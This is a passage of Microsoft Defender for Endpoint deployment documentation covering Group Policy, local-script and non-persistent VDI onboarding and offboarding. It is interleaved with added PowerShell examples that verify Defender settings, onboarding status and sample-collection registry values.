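if (-not $linked) { New-GPLink -Name $GpoName -Target $TargetOu -LinkEnabled Yes | Out-Null }

Write-Host "GPO '$GpoName' ($($gpo.Id)) is linked to $TargetOu."
Write-Host "In GPMC, add the Immediate Task under Computer Configuration > Preferences >"
Write-Host "Control Panel Settings > Scheduled Tasks, running $script as NT AUTHORITY\SYSTEM."
```

The permission step is the security-relevant part: the task runs as SYSTEM on every device the GPO reaches, so the share must not be writable by those devices or by ordinary users, and the recorded hash gives you something to compare against before the next rollout.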

Tip

After onboarding the device, you can choose to run a detection test to verify that
the device is properly onboarded to the service. For more information, see Run a
detection test on a newly onboarded Defender for Endpoint device.

Additional Defender for Endpoint configuration settings

For each device, you can state whether samples can be collected from the device when a
request is made through Microsoft Defender XDR to submit a file for deep analysis.

You can use Group Policy (GP) to configure settings, such as settings for the sample
sharing used in the deep analysis feature.

Configure sample collection settings


1. On your GP management device, copy the following files from the configuration
package:

Copy AtpConfiguration.admx into C:\Windows\PolicyDefinitions

Copy AtpConfiguration.adml into C:\Windows\PolicyDefinitions\en-US

If you're using a Central Store for Group Policy Administrative Templates, copy
the following files from the configuration package:

Copy AtpConfiguration.admx into \\<forest.root>\SysVol\<forest.root>\Policies\PolicyDefinitions

Copy AtpConfiguration.adml into \\<forest.root>\SysVol\<forest.root>\Policies\PolicyDefinitions\en-US

2. Open the Group Policy Management Console, right-click the GPO you want to
configure and click Edit.

3. In the Group Policy Management Editor, go to Computer configuration.

4. Click Policies, then Administrative templates.

5. Click Windows components and then Windows Defender ATP.

6. Choose to enable or disable sample sharing from your devices.

Note

If you don't set a value, the default value is to enable sample collection.

Other recommended configuration settings

Update endpoint protection configuration

After configuring the onboarding script, continue editing the same group policy to add
endpoint protection configurations. Perform group policy edits from a system running
Windows 10 or Windows Server 2019, Windows 11, or Windows Server 2022 so that all of the
required Microsoft Defender Antivirus settings are available. You might need to close and
reopen the Group Policy Object for the Defender ATP configuration settings to appear.

All policies are located under Computer Configuration\Policies\Administrative Templates.

Policy location: \Windows Components\Windows Defender ATP

Policy: Enable\Disable Sample collection
Setting: Enabled, with "Enable sample collection on machines" checked

Policy location: \Windows Components\Microsoft Defender Antivirus

Policy: Configure detection for potentially unwanted applications
Setting: Enabled, Block

Policy location: \Windows Components\Microsoft Defender Antivirus\MAPS

Policy: Join Microsoft MAPS
Setting: Enabled, Advanced MAPS

Policy: Send file samples when further analysis is required
Setting: Enabled, Send safe samples

Policy location: \Windows Components\Microsoft Defender Antivirus\Real-time Protection

Policy: Turn off real-time protection
Setting: Disabled

Policy: Turn on behavior monitoring
Setting: Enabled

Policy: Scan all downloaded files and attachments
Setting: Enabled

Policy: Monitor file and program activity on your computer
Setting: Enabled

Policy location: \Windows Components\Microsoft Defender Antivirus\Scan

These settings configure periodic scans of the endpoint. We recommend performing a
weekly quick scan, performance permitting.

Policy: Check for the latest virus and spyware security intelligence before running a scheduled scan
Setting: Enabled

Policy location: \Windows Components\Microsoft Defender Antivirus\Microsoft Defender Exploit Guard\Attack Surface Reduction

Get the current list of attack surface reduction rule GUIDs from Attack surface reduction
rules deployment Step 3: Implement ASR rules. For details on each rule, see Attack surface
reduction rules reference.

1. Open the Configure Attack Surface Reduction policy.

2. Select Enabled.

3. Select the Show button.

4. Add each GUID in the Value Name field with a Value of 2.

A value of 2 puts each rule in audit mode: the rule logs what it would have blocked
without blocking it, so you can review the events before changing the value to 1 (block).

Policy: Configure Controlled folder access
Location: \Windows Components\Microsoft Defender Antivirus\Microsoft Defender Exploit Guard\Controlled Folder Access
Setting: Enabled, Audit Mode

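To check what those policies actually produced on a device, the PowerShell below (added here as an example; it is not from the article or the product) reads the effective Defender Antivirus configuration with Get-MpPreference and compares it with the recommended values above, including whether each ASR rule you listed is in audit mode. The numeric mappings in the comments come from the Defender PowerShell module documentation rather than from this page, and the ASR GUID list is left for you to supply from the reference linked above.

```powershell
# Added example: compare a device's effective Defender Antivirus configuration with the
# recommended Group Policy values. Get-MpPreference shows the merged result of policy and
# local settings. Value mappings (MAPSReporting 2 = Advanced MAPS, SubmitSamplesConsent
# 1 = Send safe samples, PUAProtection 1 = Block, ASR action 2 = Audit,
# EnableControlledFolderAccess 2 = Audit mode) are from the Defender module docs.
function Test-MdeRecommendedConfig {
    [CmdletBinding()]
    param(
        # GUIDs you added to the Configure Attack Surface Reduction policy; each must be in audit mode.
        [string[]]$ExpectedAsrRuleIds = @()
    )
    $pref = Get-MpPreference
    $results = [System.Collections.Generic.List[object]]::new()

    $checks = @(
        @{ Setting = 'Join Microsoft MAPS: Advanced MAPS';          Expected = 2;     Actual = [int]$pref.MAPSReporting }
        @{ Setting = 'Send file samples: Send safe samples';        Expected = 1;     Actual = [int]$pref.SubmitSamplesConsent }
        @{ Setting = 'PUA detection: Block';                        Expected = 1;     Actual = [int]$pref.PUAProtection }
        @{ Setting = 'Real-time protection enabled';                Expected = $true; Actual = -not $pref.DisableRealtimeMonitoring }
        @{ Setting = 'Behavior monitoring enabled';                 Expected = $true; Actual = -not $pref.DisableBehaviorMonitoring }
        @{ Setting = 'Scan downloaded files and attachments';       Expected = $true; Actual = -not $pref.DisableIOAVProtection }
        @{ Setting = 'Check for security intelligence before scan'; Expected = $true; Actual = [bool]$pref.CheckForSignaturesBeforeRunningScan }
        @{ Setting = 'Controlled folder access: Audit Mode';        Expected = 2;     Actual = [int]$pref.EnableControlledFolderAccess }
    )
    foreach ($c in $checks) {
        $results.Add([pscustomobject]@{
            Setting = $c.Setting; Expected = $c.Expected; Actual = $c.Actual
            Compliant = ($c.Actual -eq $c.Expected)
        })
    }

    # ASR rules: Ids and Actions are parallel arrays; a rule missing from Ids is "not configured".
    $ids     = @($pref.AttackSurfaceReductionRules_Ids | Where-Object { $_ })
    $actions = @($pref.AttackSurfaceReductionRules_Actions)
    $configured = @{}
    for ($i = 0; $i -lt $ids.Count; $i++) { $configured[$ids[$i].ToLower()] = [int]$actions[$i] }
    foreach ($id in $ExpectedAsrRuleIds) {
        $action = $configured[$id.ToLower()]
        $results.Add([pscustomobject]@{
            Setting = "ASR rule $id in audit mode"; Expected = 2; Actual = $action
            Compliant = ($action -eq 2)
        })
    }
    return $results
}

# Usage: list only the settings that differ from the recommendation.
# Pass the GUIDs from the ASR rules reference in -ExpectedAsrRuleIds.
Test-MdeRecommendedConfig -ExpectedAsrRuleIds @() |
    Where-Object { -not $_.Compliant } | Format-Table -AutoSize
```

Because Get-MpPreference reports the merged state, a row that is non-compliant on a device that received the GPO usually means a local or MDM setting is winning, or the GPO has not applied yet, which is the failure mode the "Monitor device configuration" section below says Group Policy cannot show you on its own.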
Run a detection test to verify onboarding
After onboarding the device, you can choose to run a detection test to verify that a
device is properly onboarded to the service. For more information, see Run a detection
test on a newly onboarded Microsoft Defender for Endpoint device.

Offboard devices using Group Policy


For security reasons, the package used to offboard devices expires 30 days after the
date it was downloaded. Expired offboarding packages sent to a device are rejected.
When you download an offboarding package, you're notified of the package's expiry
date, and the date is also included in the package name.

Note

Onboarding and offboarding policies must not be deployed to the same device at
the same time; doing so causes unpredictable collisions.

1. Get the offboarding package from the Microsoft Defender portal :

a. In the navigation pane, select Settings > Endpoints > Device management >
Offboarding.

b. Select the operating system.

c. In the Deployment method field, select Group policy.

d. Click Download package and save the .zip file.

2. Extract the contents of the .zip file to a shared, read-only location that can be
accessed by the device. You should have a file named
WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-DD.cmd.

3. Open the Group Policy Management Console (GPMC), right-click the Group Policy
Object (GPO) you want to configure and click Edit.

4. In the Group Policy Management Editor, go to Computer configuration, then
Preferences, and then Control panel settings.

5. Right-click Scheduled tasks, point to New, and then click Immediate task.

6. In the Task window that opens, go to the General tab under Security options and
select Change User or Group, enter SYSTEM, then select Check Names and then
OK. NT AUTHORITY\SYSTEM appears as the user account that the task will run as.

7. Select Run whether user is logged on or not and check the Run with highest
privileges check-box.

8. In the Name field, type an appropriate name for the scheduled task (for example,
Defender for Endpoint Deployment).

9. Go to the Actions tab and select New.... Ensure that Start a program is selected in
the Action field. Enter the UNC path, using the file server's fully qualified domain
name (FQDN), of the shared
WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-DD.cmd file.

10. Select OK and close any open GPMC windows.

Important

Offboarding causes the device to stop sending sensor data to the portal, but data
from the device, including references to any alerts it has had, is retained for up
to 6 months.

Monitor device configuration


With Group Policy there isn't an option to monitor deployment of policies on the
devices. Monitoring can be done directly on the portal, or by using the different
deployment tools.

Monitor devices using the portal


1. Go to the Microsoft Defender portal .
2. Click Devices inventory.
3. Verify that devices are appearing.

Note

It can take several days for devices to start showing on the Devices list. This
includes the time it takes for the policies to be distributed to the device, the time it
takes before the user logs on, and the time it takes for the endpoint to start
reporting.

Set up Defender AV policies

Create a new Group Policy Object or group these settings with your other policies. The
choice depends on your environment and how you want to roll out the service by targeting
different organizational units (OUs).

1. After you choose an existing GPO or create a new one, edit it.

2. Browse to Computer Configuration > Policies > Administrative Templates >
Windows Components > Microsoft Defender Antivirus.

3. In the Quarantine folder, configure removal of items from the Quarantine folder.

4. In the Scan folder, configure the scan settings.

Monitor all files in real-time protection

Browse to Computer Configuration > Policies > Administrative Templates > Windows
Components > Microsoft Defender Antivirus > Real-time Protection.

Configure Windows Defender SmartScreen settings


1. Browse to Computer Configuration > Policies > Administrative Templates >
Windows Components > Windows Defender SmartScreen > Explorer.

2. Browse to Computer Configuration > Policies > Administrative Templates >
Windows Components > Windows Defender SmartScreen > Microsoft Edge.

Configure Potentially Unwanted Applications

Browse to Computer Configuration > Policies > Administrative Templates > Windows
Components > Microsoft Defender Antivirus.

Configure cloud-delivered protection and send samples automatically

Browse to Computer Configuration > Policies > Administrative Templates > Windows
Components > Microsoft Defender Antivirus > MAPS.

Note

The Send all samples option submits the most binaries, scripts, and documents for
analysis and gives the strongest security posture. The Send safe samples option
limits which file types are submitted and therefore gives a weaker security posture.

For more information, see Turn on cloud protection in Microsoft Defender Antivirus, and
Cloud protection and sample submission in Microsoft Defender Antivirus.

Check for signature update


Browse to Computer Configuration > Policies > Administrative Templates > Windows
Components > Microsoft Defender Antivirus > Security Intelligence Updates.

Configure cloud-delivered timeout and protection level

Browse to Computer Configuration > Policies > Administrative Templates > Windows
Components > Microsoft Defender Antivirus > MpEngine. Setting the cloud protection
level policy to "Default Microsoft Defender Antivirus blocking policy" leaves the
policy unconfigured, which is what is required to keep the protection level at the
Windows default.

Related topics
Onboard Windows devices using Microsoft Endpoint Configuration Manager
Onboard Windows devices using Mobile Device Management tools
Onboard Windows devices using a local script
Onboard non-persistent virtual desktop infrastructure (VDI) devices
Run a detection test on a newly onboarded Microsoft Defender for Endpoint device
Troubleshoot Microsoft Defender for Endpoint onboarding issues

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Onboard Windows devices using a local
script
Article • 09/01/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

You can also manually onboard individual devices to Defender for Endpoint. You might
want to do this first when testing the service before you commit to onboarding all
devices in your network.

Important

This script is optimized for use on up to ten devices. Local scripting is a
special onboarding method for evaluating Microsoft Defender for Endpoint: a device
onboarded with the local script reports data more frequently than with other
onboarding methods. That setting is intended for evaluation and is not normally used
in production deployments, so we recommend limiting local-script onboarding to ten
devices. For a production deployment, use other deployment options such as Group
Policy or Microsoft Endpoint Configuration Manager.

Check out Identify Defender for Endpoint architecture and deployment method to see
the various paths in deploying Defender for Endpoint.

Onboard devices
1. Open the configuration package .zip file
(WindowsDefenderATPOnboardingPackage.zip) that you downloaded from the
service onboarding wizard. You can also get the package from the Microsoft Defender
portal:
a. In the navigation pane, select Settings > Endpoints > Device management >
Onboarding.
b. Select Windows 10 or Windows 11 as the operating system.
c. In the Deployment method field, select Local Script.
d. Click Download package and save the .zip file.

2. Extract the contents of the configuration package to a location on the device you
want to onboard (for example, the Desktop). You should have a file named
WindowsDefenderATPLocalOnboardingScript.cmd.

3. Open an elevated command-line prompt on the device and run the script:
a. Go to Start and type cmd.
b. Right-click Command prompt and select Run as administrator.

4. Type the location of the script file. If you copied the file to the desktop, type:
%userprofile%\Desktop\WindowsDefenderATPLocalOnboardingScript.cmd

5. Press the Enter key or click OK.

6. Type "Y" and enter when prompted.

7. After the script completes, it will display "Press any key to continue...". Press any
key to complete the steps on the device.
For information on how to manually validate that the device is compliant and
correctly reports sensor data, see Troubleshoot Microsoft Defender for Endpoint
onboarding issues.
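The steps above run the script by hand. The PowerShell below is added as an example (it is not from the article or the product) that runs the local onboarding script from an elevated session and then checks the outcome the way the troubleshooting guide describes: the Sense service must be running and the sensor's status registry key must show the device as onboarded. The status key and its OnboardingState and OrgId values are documented in the onboarding troubleshooting article rather than on this page, and feeding "Y" on standard input to answer the script's prompt is an assumption; if your copy of the script does not accept piped input, run it interactively as described above.

```powershell
# Added example: run the local onboarding script and verify the result.
# Assumed names: the Status key with OnboardingState (1 = onboarded) and OrgId,
# as described in the onboarding troubleshooting guide.
#Requires -RunAsAdministrator

function Test-MdeOnboarding {
    $statusKey = 'HKLM:\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status'
    $sense = Get-Service -Name Sense -ErrorAction SilentlyContinue
    $props = Get-ItemProperty -Path $statusKey -ErrorAction SilentlyContinue
    $running = [bool]($sense -and $sense.Status -eq 'Running')
    [pscustomobject]@{
        ComputerName    = $env:COMPUTERNAME
        SenseInstalled  = [bool]$sense
        SenseRunning    = $running
        OnboardingState = $props.OnboardingState     # 1 once the device is onboarded
        OrgId           = $props.OrgId               # tenant the sensor reports to
        Onboarded       = ($running -and $props.OnboardingState -eq 1)
    }
}

function Invoke-MdeLocalOnboarding {
    [CmdletBinding()]
    param(
        [string]$ScriptPath = "$env:USERPROFILE\Desktop\WindowsDefenderATPLocalOnboardingScript.cmd",
        [int]$TimeoutSeconds = 120
    )
    if (-not (Test-Path -LiteralPath $ScriptPath)) { throw "Onboarding script not found: $ScriptPath" }

    $before = Test-MdeOnboarding
    if ($before.Onboarded) {
        Write-Warning "Already onboarded to tenant $($before.OrgId); not running the script again."
        return $before
    }

    # The script prompts for Y/N confirmation and ends with "Press any key";
    # feeding two lines on stdin answers both (assumption: the script reads stdin).
    $output = 'Y', '' | & $ScriptPath 2>&1
    $output | ForEach-Object { Write-Verbose "$_" }
    if ($LASTEXITCODE -ne 0) { throw "Onboarding script exited with code $LASTEXITCODE" }

    # The sensor starts shortly after the script writes its configuration; poll for it.
    $deadline = (Get-Date).AddSeconds($TimeoutSeconds)
    do {
        Start-Sleep -Seconds 5
        $after = Test-MdeOnboarding
    } until ($after.Onboarded -or (Get-Date) -gt $deadline)

    if (-not $after.Onboarded) {
        Write-Warning "Device not reporting as onboarded after $TimeoutSeconds s; see the troubleshooting guide."
    }
    return $after
}

Invoke-MdeLocalOnboarding -Verbose | Format-List
```

Checking OrgId before re-running is deliberate: a device that is already onboarded to a different tenant is a common reason a machine never appears in your portal, and running the script again does not fix it.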

Tip

After onboarding the device, you can choose to run a detection test to verify that a
device is properly onboarded to the service. For more information, see Run a
detection test on a newly onboarded Microsoft Defender for Endpoint device.

Configure sample collection settings


For each device, you can set a configuration value to state whether samples can be
collected from the device when a request is made through Microsoft Defender XDR to
submit a file for deep analysis.

You can manually configure the sample sharing setting on the device by using regedit or
creating and running a .reg file.

The configuration is set through the following registry value:

Console

Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
Name: AllowSampleCollection
Type: REG_DWORD
Value: 0 or 1

Possible values are:

0 - doesn't allow sample sharing from this device

1 - allows sharing of all file types from this device

The default value, if the registry value doesn't exist, is 1.
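One way to manage this value, added here as an example rather than taken from the article: the functions below report the effective setting (treating an absent value as the default of 1), set it explicitly, and write an equivalent .reg file. This is the same device setting that the Group Policy "Enable\Disable Sample collection" policy in the previous article controls; that the ADMX writes exactly this registry value is an assumption based on the path given above. Run elevated; the -WhatIf call shows the change without applying it.

```powershell
# Added example: read, set and export the per-device sample collection value.
# Path, value name and default are from the article; the ADMX mapping is assumed.
$SamplePolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'

function Get-MdeSampleCollection {
    $item = Get-ItemProperty -Path $SamplePolicyKey -Name AllowSampleCollection -ErrorAction SilentlyContinue
    if ($null -eq $item) {
        # Absent value: the sensor treats it as 1 (sample collection allowed).
        return [pscustomobject]@{ Configured = $false; Effective = 1; Allowed = $true }
    }
    $v = [int]$item.AllowSampleCollection
    [pscustomobject]@{ Configured = $true; Effective = $v; Allowed = ($v -eq 1) }
}

function Set-MdeSampleCollection {
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory)][ValidateSet(0, 1)][int]$Value)
    if (-not (Test-Path -Path $SamplePolicyKey)) { New-Item -Path $SamplePolicyKey -Force | Out-Null }
    if ($PSCmdlet.ShouldProcess($SamplePolicyKey, "Set AllowSampleCollection = $Value")) {
        New-ItemProperty -Path $SamplePolicyKey -Name AllowSampleCollection `
            -PropertyType DWord -Value $Value -Force | Out-Null
    }
    Get-MdeSampleCollection
}

function Export-MdeSampleCollectionReg {
    # Writes a .reg file with the same value, for deployment by other tooling.
    param(
        [Parameter(Mandatory)][ValidateSet(0, 1)][int]$Value,
        [string]$Path = "$env:TEMP\AllowSampleCollection.reg"
    )
    $hex = '{0:x8}' -f $Value
    @"
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection]
"AllowSampleCollection"=dword:$hex
"@ | Set-Content -Path $Path -Encoding Unicode   # regedit expects UTF-16 LE
    $Path
}

# Usage (elevated): show the effective state, preview disabling sharing, export a .reg.
Get-MdeSampleCollection
Set-MdeSampleCollection -Value 0 -WhatIf
Export-MdeSampleCollectionReg -Value 0
```

The Configured flag matters when you audit a fleet: a device reporting Effective = 1 with Configured = $false has never had the policy set, which is a different finding from one where someone explicitly allowed collection.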

Run a detection test to verify onboarding


After onboarding the device, you can choose to run a detection test to verify that a
device is properly onboarded to the service. For more information, see Run a detection
test on a newly onboarded Microsoft Defender for Endpoint device.

Offboard devices using a local script


For security reasons, the package used to offboard devices expires 30 days after the
date it was downloaded. Expired offboarding packages sent to a device are rejected.
When you download an offboarding package, you're notified of the package's expiry
date, and the date is also included in the package name.

Note

Onboarding and offboarding policies must not be deployed on the same device at
the same time, otherwise this will cause unpredictable collisions.

1. Get the offboarding package from the Microsoft Defender portal:

a. In the navigation pane, select Settings > Endpoints > Device management >
Offboarding.
b. Select Windows 10 or Windows 11 as the operating system.
c. In the Deployment method field, select Local Script.
d. Click Download package and save the .zip file.

2. Extract the contents of the .zip file to a shared, read-only location that can be
accessed by the devices. You should have a file named
WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-DD.cmd.

3. Open an elevated command-line prompt on the device and run the script:

a. Go to Start and type cmd.

b. Right-click Command prompt and select Run as administrator.


4. Type the location of the script file. If you copied the file to the desktop, type:
%userprofile%\Desktop\WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-DD.cmd

5. Press the Enter key or click OK.

Important

Offboarding causes the device to stop sending sensor data to the portal, but data
from the device, including references to any alerts it has had, is retained for up
to 6 months.
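Before running or linking an offboarding package, two checks are worth automating, as in the PowerShell below (an added example, not from the article or the product): the expiry date the portal embeds in the script name, and the collision the Note above warns about. The second check serves both the local-script offboarding above and the Group Policy offboarding in the previous article: it walks the GPOs that apply to an OU and reads each one's scheduled-task preference file under SYSVOL for the onboarding and offboarding script names, without depending on the preference XML schema. The share, OU and date in the usage line are placeholders.

```powershell
# Added example: validate an offboarding package and check for an onboarding/offboarding
# collision on the target OU. Assumes the GroupPolicy module and domain access.
Import-Module GroupPolicy

function Get-MdeOffboardingPackageInfo {
    param([Parameter(Mandatory)][string]$Path)
    $name = Split-Path -Path $Path -Leaf
    if ($name -notmatch '^WindowsDefenderATPOffboardingScript_valid_until_(\d{4}-\d{2}-\d{2})\.cmd$') {
        throw "Not an offboarding script name: $name"
    }
    $validUntil = [datetime]::ParseExact($Matches[1], 'yyyy-MM-dd', [cultureinfo]::InvariantCulture)
    $days = [int]($validUntil.Date - (Get-Date).Date).TotalDays
    [pscustomobject]@{ Script = $name; ValidUntil = $validUntil.Date; DaysRemaining = $days; Expired = ($days -lt 0) }
}

function Get-MdeScriptGpoLinks {
    # Which GPOs applying to the OU carry a scheduled-task preference that references an MDE script?
    param([Parameter(Mandatory)][string]$TargetOu)
    $links = (Get-GPInheritance -Target $TargetOu).InheritedGpoLinks | Where-Object { $_.Enabled }
    foreach ($link in $links) {
        $gpo = Get-GPO -Guid $link.GpoId
        $xml = Join-Path $gpo.Path 'Machine\Preferences\ScheduledTasks\ScheduledTasks.xml'
        if (-not (Test-Path -LiteralPath $xml)) { continue }
        $text = Get-Content -LiteralPath $xml -Raw
        [pscustomobject]@{
            Gpo       = $gpo.DisplayName
            Onboards  = [bool]($text -match 'WindowsDefenderATPOnboardingScript\.cmd')
            Offboards = [bool]($text -match 'WindowsDefenderATPOffboardingScript_valid_until_')
        }
    }
}

function Assert-MdeOffboardingSafe {
    param([Parameter(Mandatory)][string]$PackagePath, [Parameter(Mandatory)][string]$TargetOu)
    $pkg = Get-MdeOffboardingPackageInfo -Path $PackagePath
    if ($pkg.Expired) {
        throw "Offboarding package expired on $($pkg.ValidUntil.ToString('yyyy-MM-dd')); download a new one."
    }
    $gpos = @(Get-MdeScriptGpoLinks -TargetOu $TargetOu)
    $onboarding = @($gpos | Where-Object { $_.Onboards })
    if ($onboarding.Count -gt 0) {
        throw "Unlink or disable the onboarding GPO(s) first: $($onboarding.Gpo -join ', ')"
    }
    [pscustomobject]@{
        Package                 = $pkg
        ExistingOffboardingGpos = @($gpos | Where-Object { $_.Offboards }).Gpo
        Safe                    = $true
    }
}

# Usage (placeholder share, date and OU):
$pkgPath = '\\fs01.corp.example.com\MDEOffboarding\WindowsDefenderATPOffboardingScript_valid_until_2024-02-18.cmd'
Assert-MdeOffboardingSafe -PackagePath $pkgPath -TargetOu 'OU=Workstations,DC=corp,DC=example,DC=com' | Format-List
```

The collision check reads inherited links as well as direct ones, because an onboarding GPO linked higher in the tree still reaches the devices in the OU you are offboarding.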

Monitor device configuration


You can follow the different verification steps in the Troubleshoot onboarding issues to
verify that the script completed successfully and the agent is running.

Monitoring can also be done directly on the portal, or by using the different deployment
tools.

Monitor devices using the portal


1. Go to Microsoft Defender portal .

2. Click Devices inventory.

3. Verify that devices are appearing.

Related articles
Onboard Windows devices using Group Policy
Onboard Windows devices using Microsoft Endpoint Configuration Manager
Onboard Windows devices using Mobile Device Management tools
Onboard non-persistent virtual desktop infrastructure (VDI) devices
Run a detection test on a newly onboarded Microsoft Defender for Endpoint
device
Troubleshoot Microsoft Defender for Endpoint onboarding issues



Onboard non-persistent virtual desktop
infrastructure (VDI) devices in Microsoft
Defender XDR
Article • 09/21/2023

Virtual desktop infrastructure (VDI) is an IT infrastructure concept that lets end users
access enterprise virtual desktop instances from almost any device (such as a
personal computer, smartphone, or tablet), eliminating the need for organizations to
provide users with physical machines. Using VDI devices reduces cost, because IT
departments are no longer responsible for managing, repairing, and replacing physical
endpoints. Authorized users can access the same company servers, files, apps, and
services from any approved device through a secure desktop client or browser.

Like any other system in an IT environment, these too should have an Endpoint
Detection and Response (EDR) and Antivirus solution to protect against advanced
threats and attacks.

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Virtual desktop infrastructure (VDI) devices
Windows 10, Windows 11, Windows Server 2019, Windows Server 2022, Windows
Server 2008R2/2012R2/2016

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

Persistent VDIs - Onboarding a persistent VDI machine into Microsoft Defender for
Endpoint is handled the same way you would onboard a physical machine, such as
a desktop or laptop. Group policy, Microsoft Configuration Manager, and other
methods can be used to onboard a persistent machine. In the Microsoft Defender
portal (https://security.microsoft.com), under onboarding, select your preferred
onboarding method, and follow the instructions for that type. For more information,
see Onboarding Windows client.
Onboarding non-persistent virtual desktop
infrastructure (VDI) devices
Defender for Endpoint supports non-persistent VDI session onboarding.

There might be associated challenges when onboarding VDI instances. The following are
typical challenges for this scenario:

Instant early onboarding of a short-lived session, which must be onboarded to
Defender for Endpoint prior to the actual provisioning.
The device name is typically reused for new sessions.

In a VDI environment, VDI instances can have short lifespans. VDI devices can appear in
the Microsoft Defender portal as either single entries for each VDI instance or multiple
entries for each device.

Single entry for each VDI instance. If the VDI instance was already onboarded to
Microsoft Defender for Endpoint, and at some point deleted, and then recreated
with the same host name, a new object representing this VDI instance is NOT
created in the portal.

Note

In this case, the same device name must be configured when the session is
created, for example using an unattended answer file.

Multiple entries for each device - one for each VDI instance.

Important

If you're deploying non-persistent VDIs through cloning technology, make sure
that your internal template VMs are not onboarded to Defender for Endpoint. This
recommendation is to avoid cloned VMs from being onboarded with the same
senseGuid as your template VMs, which could prevent VMs from showing up as
new entries in the Devices list.

The following steps guide you through onboarding VDI devices and highlight steps for
single and multiple entries.

Warning

In environments with low resource configurations, the VDI boot procedure might slow
the Defender for Endpoint sensor onboarding.

Onboarding steps

Note

Windows Server 2016 and Windows Server 2012 R2 must be prepared by applying
the installation package first using the instructions in Onboard Windows servers
for this feature to work.

1. Open the VDI configuration package .zip file (WindowsDefenderATPOnboardingPackage.zip)
that you downloaded from the service onboarding wizard. You can also get the package
from the Microsoft Defender portal:

a. In the navigation pane, select Settings > Endpoints > Device management >
Onboarding.

b. Select the operating system.

c. In the Deployment method field, select VDI onboarding scripts for non-
persistent endpoints.

d. Click Download package and save the .zip file.

2. Copy the files from the WindowsDefenderATPOnboardingPackage folder extracted
from the .zip file into the golden/primary image under the path
C:\WINDOWS\System32\GroupPolicy\Machine\Scripts\Startup.

a. If you are implementing multiple entries for each device - one for each session,
copy WindowsDefenderATPOnboardingScript.cmd.

b. If you're implementing a single entry for each device, copy both Onboard-
NonPersistentMachine.ps1 and WindowsDefenderATPOnboardingScript.cmd.

Note

If you don't see the C:\WINDOWS\System32\GroupPolicy\Machine\Scripts\Startup folder,
it might be hidden. You'll need to choose the Show hidden files and folders option
from File Explorer.

3. Open a Local Group Policy Editor window and navigate to Computer
Configuration > Windows Settings > Scripts > Startup.

Note

Domain Group Policy may also be used for onboarding non-persistent VDI
devices.

4. Depending on the method you'd like to implement, follow the appropriate steps:

For single entry for each device:

Select the PowerShell Scripts tab, then select Add (Windows Explorer opens
directly in the path where you copied the onboarding script earlier). Navigate
to onboarding PowerShell script Onboard-NonPersistentMachine.ps1 . There's
no need to specify the other file, as it is triggered automatically.

For multiple entries for each device:

Select the Scripts tab, then click Add (Windows Explorer opens directly in the
path where you copied the onboarding script earlier). Navigate to the
onboarding batch script WindowsDefenderATPOnboardingScript.cmd.

5. Test your solution:

a. Create a pool with one device.

b. Log on to device.

c. Log off from device.

d. Log on to device with another user.

e. Depending on the method you'd like to implement, follow the appropriate
steps:

For single entry for each device: Check only one entry in Microsoft
Defender portal.
For multiple entries for each device: Check multiple entries in Microsoft
Defender portal.
6. Click Devices list on the Navigation pane.

7. Use the search function by entering the device name and select Device as search
type.

For downlevel SKUs (Windows Server 2008 R2)

Note

These instructions for other Windows server versions also apply if you are running
the previous Microsoft Defender for Endpoint for Windows Server 2016 and
Windows Server 2012 R2 that requires the MMA. Instructions to migrate to the new
unified solution are at Server migration scenarios in Microsoft Defender for
Endpoint.

The following registry is relevant only when the aim is to achieve a 'Single entry for each
device'.

1. Set the registry value:

Console

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection\DeviceTagging]
"VDI"="NonPersistent"

or using the command line:

Console

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection\DeviceTagging" /v VDI /t REG_SZ /d "NonPersistent" /f

2. Follow the server onboarding process.

Updating virtual desktop infrastructure (VDI) images (persistent or non-persistent)

With the ability to easily deploy updates to VMs running in VDIs, we've shortened this
guide to focus on how you can get updates on your machines quickly and easily. You no
longer need to create and seal golden images on a periodic basis, as updates are
expanded into their component bits on the host server and then downloaded directly to
the VM when it's turned on.

If you have onboarded the primary image of your VDI environment (SENSE service is
running), then you must offboard and clear some data before putting the image back
into production.

1. Offboard the machine.

2. Confirm that the sensor is stopped by running the following command in a CMD
window; the STATE line should report STOPPED:

Console

sc query sense

3. Run the following commands in a CMD window:

Console

:: Remove the sensor's cached data so clones don't inherit it
del "C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Cyber\*.*" /f /s /q
:: Remove the device identity; each clone must generate its own senseGuid on first boot
REG DELETE "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection" /v senseGuid /f
REG DELETE "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection" /v 7DC0B629-D7F6-4DB3-9BF7-64D5AAF50F1A /f
REG DELETE "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\48A68F11-7A16-4180-B32C-7F974C7BD783" /f
exit
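As an added example (not from the article or the product), the PowerShell below does the same cleanup as the CMD steps, but first reports what sensor residue the image still carries and refuses to proceed while the Sense service is running, so a golden image is not sealed with a senseGuid that every clone would inherit. The paths and value names are the ones the CMD steps use; run it elevated on the image after offboarding, with -WhatIf first.

```powershell
# Added example: check a VDI golden image for sensor residue before sealing it, then remove it.
# Paths and value names are the ones listed in the article's CMD steps.
$MdeKey    = 'HKLM:\SOFTWARE\Microsoft\Windows Advanced Threat Protection'
$CyberDir  = 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Cyber'
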